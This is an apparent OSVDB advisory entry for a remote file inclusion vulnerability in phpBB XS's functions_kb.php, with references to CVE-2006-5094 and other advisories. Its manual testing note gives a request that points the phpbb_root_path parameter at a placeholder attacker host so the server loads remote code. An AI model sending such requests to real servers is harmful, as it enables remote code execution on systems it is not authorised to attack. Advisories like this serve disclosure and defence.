phpBB XS includes/functions_kb.php phpbb_root_path Variable Remote File Inclusion

2006-09-29T10:18:55
ID OSVDB:29283
Type osvdb
Reporter OSVDB
Modified 2006-09-29T10:18:55

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/path_to_phpbbXS2/includes/functions_kb.php?phpbb_root_path=http://[attacker]?

References:

Vendor URL: http://www.phpbbxs.eu/ Secunia Advisory ID:22177 Other Advisory URL: http://kernel-32.blogspot.com/2006/09/phpbb-xs-phpbbrootpath-remote-file.html Mail List Post: http://www.securityfocus.com/archive/1/archive/1/447292/100/0/threaded Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0513.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0479.html Keyword: SolpotCrew Advisory #14 ISS X-Force ID: 29250 Generic Informational URL: http://www.nyubicrew.org/adv/solpot-adv-10.txt FrSIRT Advisory: ADV-2006-3843 CVE-2006-5094 Bugtraq ID: 20251